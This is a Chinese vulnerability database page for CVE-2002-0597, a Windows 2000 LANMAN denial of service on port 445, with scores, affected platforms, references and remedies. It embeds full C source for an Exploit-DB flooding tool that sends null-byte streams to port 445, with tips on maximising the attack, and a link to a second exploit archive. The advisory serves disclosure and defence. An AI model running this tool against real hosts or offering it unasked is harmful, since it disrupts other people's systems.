CVE-2002-0597
CVSS5.0
发布时间 :2002-06-18 00:00:00
修订时间 :2008-09-10 15:12:34
NMCOE    

[原文]LANMAN service on Microsoft Windows 2000 allows remote attackers to cause a denial of service (CPU/memory exhaustion) via a stream of malformed data to microsoft-ds port 445.


[CNNVD]Microsoft Windows LANMAN服务服务拒绝(CPU/内存消耗)漏洞(CNNVD-200206-043)

        Microsoft Windows 2000中LANMAN服务存在漏洞。远程攻击者借助microsoft-ds端口445的一连串畸形数据导致服务拒绝(CPU/内存消耗)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0597
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0597
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-043
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/693099
(UNKNOWN)  CERT-VN  VU#693099
http://www.securityfocus.com/bid/4532
(VENDOR_ADVISORY)  BID  4532
http://online.securityfocus.com/archive/1/268066
(VENDOR_ADVISORY)  BUGTRAQ  20020417 KPMG-2002011: Windows 2000 microsoft-ds Denial of Service
http://www.iss.net/security_center/static/8867.php
(VENDOR_ADVISORY)  XF  win2k-lanman-dos(8867)
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q320751
(UNKNOWN)  MSKB  Q320751
http://www.osvdb.org/5179
(UNKNOWN)  OSVDB  5179
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0025.html
(UNKNOWN)  VULNWATCH  20020417 [VulnWatch] KPMG-2002011: Windows 2000 microsoft-ds Denial of Service

- 漏洞信息

Microsoft Windows LANMAN服务服务拒绝(CPU/内存消耗)漏洞
中危 未知
2002-06-18 00:00:00 2005-05-02 00:00:00
远程  
        Microsoft Windows 2000中LANMAN服务存在漏洞。远程攻击者借助microsoft-ds端口445的一连串畸形数据导致服务拒绝(CPU/内存消耗)。

- 公告与补丁

        

- 漏洞信息 (21388)

Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) (EDBID:21388)
windows dos
2002-04-17 Verified
0 Daniel Nystrom
N/A [点击下载]
source: http://www.securityfocus.com/bid/4532/info

An issue has been discovered in Windows 2000, which could cause a denial of system services.

Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage. 

/********************************************************
* 	Microsoft Windows 2000 Remote DoS 		*
*	---------------------------------		*
*							*
* Hello :)						*
* This is an DoS exploit that utilizes the flaw found 	*
* by KPMG Denmark, to crasch or hang any Win2k box 	*
* running the LanMan server on port 445 (ms-ds).  	*
* What it does is just a simple 10k NULL string		*
* bombardment of port 445 TCP or UDP.			*
*							*
*			                                *
* By: Daniel Nystrom <exce@netwinder.nu>		*
* Download: www.telhack.tk / exce.darktech.org		*
*							*
* Suggestions: When performing the attack, use UDP if 	*
*	       you are attacking from a single host. 	*
*	       TCP only eats about 35% CPU on an AMD	*
*	       Athlon XP 1800+ while UDP eats 99%.      *
*	       So if TCP is the only option, use more   *
*	       than one attacking host. All in all this *
*              DoS is "pretty weak" and should be used  *
*              from more than one host in each attack   *
*              to get the best result.                  *
*							*
* Compiles on: Linux (Debian 2.2r6 and RH 7.3 tested).  *
*              Should compile on other *nix's as well.  *
*							*
* Thanks: Peter Grundl, for answering my Q's :)         *
*							*
* greets: xenogen, ifa-, zeromatic, RTJ, all@telhack    *
*							*
********************************************************/

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define MICROSOFT_DS_PORT 445

unsigned long resolveTarget(char nstarget[]);


int main(int argc, char *argv[])
{
        int sock;
	int count;
	struct sockaddr_in target;
	unsigned short port = MICROSOFT_DS_PORT;
	char *nullbuffer;


	printf("%c[41m", 0x1B);
	fprintf(stdout, "\n--[ excE's Remote Microsoft Windows 2000 DoS (microsoft-ds)\n"); 
	printf("%c[0m", 0x1B);
	fprintf(stdout, "-----------------------------------------------------------\n");

        if(argc != 4)
        {
                fprintf(stderr, "--[ Invalid number of parameters!\n");
                fprintf(stderr, "--[ Usage: %s <Server IP> <TCP/UDP> <Send Count>\n", argv[0]);
                fprintf(stderr, "--[ Forex: %s 127.0.0.1 UDP 10000\n\n", argv[0]);
                exit(-1);
        }

	nullbuffer = (char *) malloc(10*1024*sizeof(char));
	bzero(nullbuffer,sizeof(nullbuffer));
	
	fprintf(stdout, "--[ Starting attack on %s...\n", argv[1]);

	memset(&target, 0, sizeof(target));
	target.sin_family 	= AF_INET;
	target.sin_addr.s_addr 	= resolveTarget(argv[1]);
	target.sin_port		= htons(port);


	if(argv[2][0] == 'U')
	{
		if((sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		{
			perror("socket() failed ");
			exit(-1);
		}
	
		fprintf(stdout, "--[ Sending NULL byte string * %d via UDP\n", atoi(argv[3]));

		for(count=0;count<atoi(argv[3]);count++)
		{
		    if(sendto(sock, nullbuffer, strlen(nullbuffer), 0, (struct sockaddr *) &target, sizeof(target)) != strlen(nullbuffer))
		    {
				perror("sendto() failed ");
				exit(-1);
		    } else { printf("."); } 
		}
		close(sock);
		printf("\n");
	}
	 else if(argv[2][0] == 'T')
	{
		
		fprintf(stdout, "--[ Connecting and sending NULL byte string * %d...\n", atoi(argv[3]));
		 
		if((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
		{
			perror("socket() failed ");
			exit(-1);
		}

		if(connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0)
		{
			perror("connect() failed ");
			exit(-1);
		}

		for(count=0;count<atoi(argv[3]);count++)
		{ 
			if(send(sock, nullbuffer, strlen(nullbuffer), 0) != strlen(nullbuffer))
			{
				perror("send() failed ");
				exit(-1);
			} else { printf("."); }

		}
		close(sock);
		printf("\n");
	} else
	{
		fprintf(stderr, "--[ Error: You must define a protocol (TCP or UDP)\n\n");
		exit(-1);
	}

	fprintf(stdout, "--[ Finished flooding target!\n");
	fprintf(stdout, "--[ http://www.telhack.tk\n");
	
	return 0;
}

unsigned long resolveTarget(char nstarget[])
{
	struct hostent *targetname;

	if((targetname=gethostbyname(nstarget)) == NULL)
	{
		fprintf(stderr, "--[ Name lookup failed. Please enter a valid IP or hostname\n");
		exit(-1);
	}

	return *((unsigned long *) targetname->h_addr_list[0]);
}
		

- 漏洞信息 (21389)

Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) (EDBID:21389)
windows dos
2003-01-03 Verified
0 ch0wn
N/A [点击下载]
source: http://www.securityfocus.com/bid/4532/info
 
An issue has been discovered in Windows 2000, which could cause a denial of system services.
 
Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage.


http://www.exploit-db.com/sploits/21389.tar.gz 		

- 漏洞信息

5179
Microsoft Windows 2000 microsoft-ds DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Microsoft Windows 2000 contains a flaw that may allow a remote denial of service. The issue is triggered when (a) multiple connections to TCP Port 445 occurs or (b) a malicious user sends a stream of malformed packets or null characters to TCP Port 445, and will result in loss of availability for the system.

- 时间线

2002-04-17 2001-10-15
2002-04-17 Unknow

- 解决方案

Upgrade to Service Pack 3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): 1. Disable access to TCP Port 445, either with the use of a personal firewall, or by disabling NetBIOS over TCP/IP. SecurityFocus BID 4532 details disabling NetBIOS over TCP/IP. 2. Create and set the MaxWorkItems value in the registry to a value that the computer can support. Refer to the Microsoft KB Article 320751 for specific steps to creating the MaxWorkItems registry value.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站